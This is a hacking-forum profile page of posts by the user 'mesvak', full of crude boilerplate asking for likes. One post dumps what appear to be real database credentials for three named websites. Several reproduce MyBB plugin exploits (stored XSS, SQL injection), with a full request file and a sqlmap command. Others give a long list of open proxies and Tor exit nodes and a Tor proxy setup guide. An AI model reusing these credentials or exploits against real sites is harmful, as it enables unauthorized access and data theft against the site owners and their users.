mesvak

Members
  • Content Count

    2,691
  • Last visited

  • Days Won

    5

Everything posted by mesvak

  1. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  2. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  3. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  4. [hide] https://mega.nz/#F!qiYiUa4K!aCn1t5uDGw6_XaSS10j6DA [/hide] ENJOI UR ASS LILS Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  5. [hide] 1- first of all you needa dl the program that i provided for ya below JDEV FOR NETWORK tHEN INSTALL IT PRESS NEXT NEXT NEXT ,.... TILL ITS DONE 2-OPEN CHROME AND GO TO THIS SITE https://chrome.google.com/webstore/detail/falcon-proxy/gchhimlnjdafdlkojbffdkogjhhkdepf/related?hl=EN https://pasteboard.co/I5hck6P.png 3- install falcon proxy as you can see above 4- then move on to falcon proxy and click on it , click create a new one and fill it like this type>>sock5 Ip>> 127.0.0.1 port>>9050 rest of em dont matter https://pasteboard.co/I5hdauR.png 5-then press create and activate this bullshit like this https://pasteboard.co/I5he7Qq.png 6-now the fucking theory is done now lets test go to this site while proxy falcon is online https://dnsleaktest.com/ Then press extended one not standard wait till u get all the results if u are doing right u needa get to many ip adress like this https://pasteboard.co/I5hf0Bf.png this means u are done and you can go to onion shits like this one zial32pytl.onion or...... [/hide] PROGRAM: [hide] JDEV TOR NETWORK : LINK [/hide] [/url] Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  6. [hide] [ DATABASE ] http://www.3wbc.org.au [-]Database Name = wbcorgau_wp [-]Database User = wbcorgau_wpuser Database Password = 1sr0*CVPWLB8m4S68XjW [-]Database Host = localhost [ DATABASE ] http://paneepace.it [-]Database Name = ewkeqoli_pane_2018 [-]Database User = ewkeqoli_pane_2018 Database Password = pane_2018 [-]Database Host = localhost [ DATABASE ] http://www.llardana.com [-]Database Name = db1376399_llardana [-]Database User = u1376399_user Database Password = L4laRf45Lojx5XXDFrrf5gG [-]Database Host = mysql508int.srv-acens.com [/hide] enjoI Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD
  7. [hide] hacked and fucked site THIS IS LIE TO BE ME SECOND PART [/hide] Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD MY iNStagram Id : mesvak
  8. PLS READ WATEVER INSIDE THE CODE SECTION ''No HTML escaping when returning an $error in /install/index.php can lead to an XSS which can be used to take over an attacker account.'' and THE SHITTY THING IS Y OU CAN EVEN INSTALL WATEVER MYBB VERSION U WANT AND EVEN CREATE HOST AND BE ABLE TO TAKE THE DB ON THAT SHIT PLS READ THAN TALK :kappa:
  9. [hide] # Exploit Title: MyBB Thank Like Plugin 3.0.0 - XSS # Date: 10/3/2018 # Author: Mesvak # Version: 3.0.0 # Tested on: KALI # CVE: CVE-2018-14888 1. Description: This plugin allows users to thank/like other users threads/posts. In user profiles it shows your most liked post/thread, the post/thread subjects aren't sanitized to user input. 2. Proof of Concept: - Use the following as the post/thread subject - Get that post/thread liked by another user (or you) - Visit your profile to see alert. [/hide] soLUTION IS UPDATING TO NEW VERSION OF ASS Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD
  10. [hide] # Exploit Title: MyBB Latest Posts on Profile Plugin v1.1 - Cross-Site Scripting # Date: 4/20/2018 # Author: Mesvak # Version: 1.1 # Tested on: Ubuntu 17.10 1. Description: Adds a new section to user profiles that will display their last posts. 2. Proof of Concept: Persistent XSS - Create a thread with the following subject - Now visit your profile to see the alert. [/hide] SOLUTION [hide] $d['tsubject'] = htmlspecialchars_uni($d['tsubject']); [/hide] Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD
  11. [hide] # Exploit Title: MyBB Threads to Link Plugin v1.3 - Persistent XSS # Date: 3/15/2018 # Author: 0xB9 # Version: v1.3 # Tested on: Ubuntu 17.10 1. Description: When editing a thread the user is given to the option to convert the thread to a link. 2. Proof of Concept: Persistent XSS - Edit a thread or post you've made - At the bottom of the edit page in the Thread Link box input the following "> - Now visit the forum your thread/post exists in to see the alert. [/hide] SOLUTION [hide] Patch in line 83: $thread['tlink'] = ($thread['tlink']); to $thread['tlink'] = htmlspecialchars_uni($thread['tlink']); [/hide] Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD
  12. [hide] # Exploit Title: MyBB Downloads 2.3 - SQL Injection # Date: 28-10-2018 # Exploit Author: MEsvak lil ass # Contact: instagram.com/mesvak # Version: 2.0.3 # Tested on: Ubuntu 18.04 1. Description: It is a plugin which adds a page to download files. If enabled, regular members can add new downloads to the page after admin approval. 2. Proof of Concept: Persistent XSS - Go to downloads.php page - Create a New Download - Add the following to the title: a" - Now on submit, the user will be prompted to an SQL Injection specific error. ``` MyBB has experienced an internal SQL error and cannot continue. SQL Error: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"a""' at line 1 Query: SELECT * FROM mybb_downloads WHERE name="a"" ``` - THis can be exploited with: sqlmap -r request_file -p name --threads 5 3. Request File example: POST /downloads.php?newdownload=1 HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:8081/downloads.php?newdownload=1 Content-Type: multipart/form-data; boundary=---------------------------171894060312075061251712806160 Content-Length: 1029 Cookie: mybb[lastvisit]=1540744980; mybb[lastactive]=1540745020; sid=677a58d33fe23e7f2ea3841c79496fcd; loginattempts=1; mybbuser=3_waeMfSMiIRrTpPqW2uy8ZF8AMx8pyRtMCUJ6Gx0yoGRyLBsBow Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 -----------------------------171894060312075061251712806160 Content-Disposition: form-data; name="my_post_key" 6cb47e578ed16aa5272c55b0cb8745b4 -----------------------------171894060312075061251712806160 Content-Disposition: form-data; name="name" a" -----------------------------171894060312075061251712806160 Content-Disposition: form-data; name="shortdesc" test -----------------------------171894060312075061251712806160 Content-Disposition: form-data; name="description" test -----------------------------171894060312075061251712806160 Content-Disposition: form-data; name="image" -----------------------------171894060312075061251712806160 Content-Disposition: form-data; name="url" 1 -----------------------------171894060312075061251712806160 Content-Disposition: form-data; name="numimages" 4 -----------------------------171894060312075061251712806160 Content-Disposition: form-data; name="submit" Publish download -----------------------------171894060312075061251712806160-- [/hide] this is the plugin that must be on the mybb site to be injected by shitty ass exploit link Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD
  13. [hide] Exploit Title: XSS in MyBB up to 1.8.13 via installer # Date: Found on 05-29-2017 # Exploit Author: Mesvak # Version: Version > 1.8.13 No HTML escaping when returning an $error in /install/index.php can lead to an XSS which can be used to take over an attacker account. The vulnerability occurs in /install/index.php:2503 and occurs because there is no html encoding of the $error. A simple way to exploit this is to create an error by using the Database Server Hostname and inserting HTML characters there. It is a POST XSS and this is a PoC: Using this attack you can steal the cookies and you can install the MyBB server as you want, giving you almost full control over the MyBB server. A simple fix would be to change the function error_list($array) to: function error_list($array) { $string = "</pre> <ul>\n"; foreach($array as $error) { $string .= ""; $string .= htmlspecialchars($error); $string .= ""; } $string .= "</ul>\n";<br>return $string [/hide] WELP as far as ik they already fixed this Now fuck off XD Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD
  14. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils meme
  15. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils meme
  16. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils meme
  17. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  18. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  19. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  20. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  21. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  22. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  23. [hide] LINJK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  24. [hide] LIVE | 138.68.143.47:3349 | 0.31 | Unknow | Unknow | | Unknow | Blacklist: Yes | mesvak new PRXY GRB V2 LIVE | 64.130.136.31:45824 | 0.24 | Unknow | Unknow | | Unknow | Blacklist: Yes | mesvak new PRXY GRB V2 LIVE | 207.180.247.235:50293 | 0.61 | Unknow | Unknow | Kustbandet AB | Anonymous Proxy | Blacklist: No | mesvak new PRXY GRB V2 LIVE | 207.180.247.235:50481 | 3.26 | Unknow | Unknow | tor1e1.digitale-gesellschaft.ch | Anonymous Proxy | Blacklist: No | mesvak new PRXY GRB V2 LIVE | 50.62.35.81:36721 | 3.21 | Arizona | 85260 | ip-50-62-35-81.ip.secureserver.net | United States | Blacklist: Yes | mesvak new PRXY GRB V2 LIVE | 103.216.82.43:6667 | 3.49 | Gujarat | 396421 | Gtpl Dcpl Private Limited | India | Blacklist: No | mesvak new PRXY GRB V2 LIVE | 98.172.253.157:40753 | 8.36 | Unknow | Unknow | Cox Communications | United States | Blacklist: No | mesvak new PRXY GRB V2 LIVE | 46.105.99.152:29510 | 1.32 | Unknow | Unknow | | Unknow | Blacklist: Yes | mesvak new PRXY GRB V2 LIVE | 50.62.35.81:52003 | 2.65 | Arizona | 85260 | ip-50-62-35-81.ip.secureserver.net | United States | Blacklist: Yes | mesvak new PRXY GRB V2 LIVE | 207.180.247.234:50662 | 2.64 | Unknow | Unknow | tor48.quintex.com | Anonymous Proxy | Blacklist: No | mesvak new PRXY GRB V2 LIVE | 207.180.247.235:50702 | 4.7 | Unknow | Unknow | dreamatorium.badexample.net | Anonymous Proxy | Blacklist: No | mesvak new PRXY GRB V2 LIVE | 207.180.247.234:50576 | 0.87 | Unknow | Unknow | tor-exit.hartvoorinternetvrijheid.nl | Anonymous Proxy | Blacklist: No | mesvak new PRXY GRB V2 LIVE | 207.180.247.234:50807 | 0.86 | Unknow | Unknow | Zwiebelfreunde e.V. | Anonymous Proxy | Blacklist: No | mesvak new PRXY GRB V2 LIVE | 192.169.140.74:14774 | 2.48 | Arizona | 85260 | ip-192-169-140-74.ip.secureserver.net | United States | Blacklist: Yes | mesvak new PRXY GRB V2 LIVE | 50.62.35.81:40132 | 4.48 | Arizona | 85260 | ip-50-62-35-81.ip.secureserver.net | United States | Blacklist: Yes | mesvak new PRXY GRB V2 LIVE | 192.169.140.74:36193 | 6.43 | Unknow | Unknow | | Unknow | Blacklist: Yes | mesvak new PRXY GRB V2 LIVE | 46.105.99.152:60931 | 0.32 | Unknow | Unknow | | Unknow | Blacklist: Yes | mesvak new PRXY GRB V2 LIVE | 207.180.247.234:50604 | 5.86 | Unknow | Unknow | Next Layer Telekommunikationsdienstleistungs- und | Anonymous Proxy | Blacklist: No | mesvak new PRXY GRB V2 LIVE | 74.123.16.188:10200 | 0.12 | Tennessee | 37388 | Tullahoma Utilities Authority | United States | Blacklist: No | mesvak new PRXY GRB V2 LIVE | 121.54.175.93:34645 | 0.85 | Unknow | Unknow | | Unknow | Blacklist: Yes | mesvak new PRXY GRB V2 LIVE | 76.98.94.54:54121 | 0.14 | Pennsylvania | 19064 | c-76-98-94-54.hsd1.pa.comcast.net | United States | Blacklist: Yes | mesvak new PRXY GRB V2 LIVE | 192.169.140.74:10867 | 5.16 | Arizona | 85260 | ip-192-169-140-74.ip.secureserver.net | United States | Blacklist: Yes | mesvak new PRXY GRB V2 LIVE | 71.238.27.187:39360 | 0.7 | Oregon | 97219 | c-71-238-27-187.hsd1.or.comcast.net | United States | Blacklist: Yes | mesvak new PRXY GRB V2 LIVE | 50.62.35.81:58312 | 3.13 | Arizona | 85260 | ip-50-62-35-81.ip.secureserver.net | United States | Blacklist: No | mesvak new PRXY GRB V2 LIVE | 46.4.88.203:9050 | 2.89 | Unknow | Unknow | Cogeco Peer 1 | Anonymous Proxy | Blacklist: No | mesvak new PRXY GRB V2 LIVE | 207.180.247.234:50146 | 6.88 | Unknow | Unknow | dreamatorium.badexample.net | Anonymous Proxy | Blacklist: No | mesvak new PRXY GRB V2 LIVE | 50.62.35.81:37397 | 2.87 | Arizona | 85260 | ip-50-62-35-81.ip.secureserver.net | United States | Blacklist: No | mesvak new PRXY GRB V2 LIVE | 192.169.193.54:20322 | 3.11 | Arizona | 85260 | ip-184-168-146-10.ip.secureserver.net | United States | Blacklist: No | mesvak new PRXY GRB V2 LIVE | 192.169.140.74:64789 | 4.83 | Arizona | 85260 | ip-192-169-140-74.ip.secureserver.net | United States | Blacklist: Yes | mesvak new PRXY GRB V2 LIVE | 207.180.247.234:50573 | 0.92 | Unknow | Unknow | exit3.tor-network.net | Anonymous Proxy | Blacklist: Yes | mesvak new PRXY GRB V2 LIVE | 103.216.82.203:6667 | 1.89 | Gujarat | 396421 | Gtpl Dcpl Private Limited | India | Blacklist: No | mesvak new PRXY GRB V2 LIVE | 192.169.140.74:16526 | 3.91 | Arizona | 85260 | ip-192-169-140-74.ip.secureserver.net | United States | Blacklist: Yes | mesvak new PRXY GRB V2 LIVE | 14.52.216.9:10081 | 1.84 | Seoul-t\'ukpyolsi | Unknow | Korea Telecom | Korea, Republic of | Blacklist: Yes | mesvak new PRXY GRB V2 LIVE | 103.240.161.109:6667 | 2.39 | Gujarat | 384265 | GTPL Broadband Pvt. | India | Blacklist: No | mesvak new PRXY GRB V2 LIVE | 175.45.11.46:8082 | 0.85 | Unknow | Unknow | | Unknow | Blacklist: Yes | mesvak new PRXY GRB V2 LIVE | 150.129.171.115:6667 | 1.77 | Unknow | Unknow | GTPL Broadband Pvt. | India | Blacklist: No | mesvak new PRXY GRB V2 Live | 184.178.172.28:15294 | United States | Unknown | Unknown | Unknown | mesvak new PRXY GRB V2 Live | 149.202.136.73:3128 | France | Unknown | Unknown | Unknown | mesvak new PRXY GRB V2 Live | 175.45.11.45:8082 | Hong Kong | Kwun Tong | 00 | Unknown | mesvak new PRXY GRB V2 Live | 189.199.106.202:9999 | Mexico | La Piedad | 16 | 59320 | mesvak new PRXY GRB V2 Live | 99.228.176.205:2080 | Canada | Brampton | ON | L6P | mesvak new PRXY GRB V2 Live | 178.62.159.94:16707 | Netherlands | Amsterdam | 07 | 1000 | mesvak new PRXY GRB V2 Live | 42.112.20.116:7200 | Vietnam | Hanoi | 44 | Unknown | mesvak new PRXY GRB V2 Live | 68.183.126.25:8888 | United States | Riverside | CA | 92509 | mesvak new PRXY GRB V2 Live | 70.166.38.71:24801 | United States | Unknown | Unknown | Unknown | mesvak new PRXY GRB V2 Live | 178.62.159.94:54346 | Netherlands | Amsterdam | 07 | 1000 | mesvak new PRXY GRB V2 Live | 71.238.27.187:39360 | United States | Portland | OR | 97219 | mesvak new PRXY GRB V2 Live | 46.4.88.203:9050 | Germany | Unknown | Unknown | Unknown | mesvak new PRXY GRB V2 Live | 46.4.20.168:9050 | Germany | Unknown | Unknown | Unknown | mesvak new PRXY GRB V2 Live | 178.62.250.186:9050 | Netherlands | Amsterdam | 07 | 1000 | mesvak new PRXY GRB V2 Live | 150.129.52.74:6667 | India | Unknown | Unknown | Unknown | mesvak new PRXY GRB V2 Live | 37.59.8.29:34133 | France | Unknown | Unknown | Unknown | mesvak new PRXY GRB V2 Live | 166.62.85.232:22433 | United States | Scottsdale | AZ | 85260 | mesvak new PRXY GRB V2 Live | 121.54.175.101:34645 | Hong Kong | Central District | 00 | Unknown | mesvak new PRXY GRB V2 Live | 174.75.238.82:16409 | United States | Unknown | Unknown | Unknown | mesvak new PRXY GRB V2 Live | 178.62.59.71:52351 | United Kingdom | London | H9 | EC4N | mesvak new PRXY GRB V2 Live | 169.239.221.90:50802 | South Africa | Unknown | Unknown | Unknown | mesvak new PRXY GRB V2 Live | 184.178.172.28:15294 | United States | Unknown | Unknown | Unknown | mesvak new PRXY GRB V2 Live | 175.45.11.45:8082 | Hong Kong | Kwun Tong | 00 | Unknown | mesvak new PRXY GRB V2 Live | 149.202.136.73:3128 | France | Unknown | Unknown | Unknown | mesvak new PRXY GRB V2 Live | 166.62.80.198:19703 | United States | Scottsdale | AZ | 85260 | mesvak new PRXY GRB V2 Live | 103.21.163.76:6667 | India | Unknown | Unknown | Unknown | mesvak new PRXY GRB V2 Live | 167.99.60.252:9050 | United States | Fort Worth | TX | 76104 | mesvak new PRXY GRB V2 Live | 42.112.20.116:7200 | Vietnam | Hanoi | 44 | Unknown | mesvak new PRXY GRB V2 Live | 174.75.238.76:16391 | United States | Unknown | Unknown | Unknown | mesvak new PRXY GRB V2 Live | 68.183.126.25:8888 | United States | Riverside | CA | 92509 | mesvak new PRXY GRB V2 Live | 99.228.176.205:2080 | Canada | Brampton | ON | L6P | mesvak new PRXY GRB V2 Live | 189.199.106.202:9999 | Mexico | La Piedad | 16 | 59320 | mesvak new PRXY GRB V2 Live | 178.62.59.71:52351 | United Kingdom | London | H9 | EC4N | mesvak new PRXY GRB V2 Live | 70.166.38.71:24801 | United States | Unknown | Unknown | Unknown | mesvak new PRXY GRB V2 Live | 99.228.176.205:2080 | Canada | Brampton | ON | L6P | mesvak new PRXY GRB V2 Live | 174.75.238.76:16391 | United States | Unknown | Unknown | Unknown | mesvak new PRXY GRB V2 Live | 175.45.11.46:8082 | Hong Kong | Kwun Tong | 00 | Unknown | mesvak new PRXY GRB V2 Live | 174.75.238.82:16409 | United States | Unknown | Unknown | Unknown | mesvak new PRXY GRB V2 Live | 166.62.85.232:22433 | United States | Scottsdale | AZ | 85260 | mesvak new PRXY GRB V2 Live | 184.178.172.28:15294 | United States | Unknown | Unknown | Unknown | mesvak new PRXY GRB V2 Live | 42.112.20.116:7200 | Vietnam | Hanoi | 44 | Unknown | mesvak new PRXY GRB V2 Live | 71.238.27.187:39360 | United States | Portland | OR | 97219 | mesvak new PRXY GRB V2 Live | 34.207.196.193:9050 | United States | Houston | TX | 77072 | mesvak new PRXY GRB V2 Live | 178.62.159.94:54346 | Netherlands | Amsterdam | 07 | 1000 | mesvak new PRXY GRB V2 Live | 169.239.221.90:50802 | South Africa | Unknown | Unknown | Unknown | mesvak new PRXY GRB V2 Live | 103.240.161.109:6667 | India | Patan | 09 | 360530 | mesvak new PRXY GRB V2 Live | 68.183.126.25:8888 | United States | Riverside | CA | 92509 | mesvak new PRXY GRB V2 Live | 121.54.175.93:34645 | Hong Kong | Central District | 00 | Unknown | mesvak new PRXY GRB V2 [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  25. [hide] LINK [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils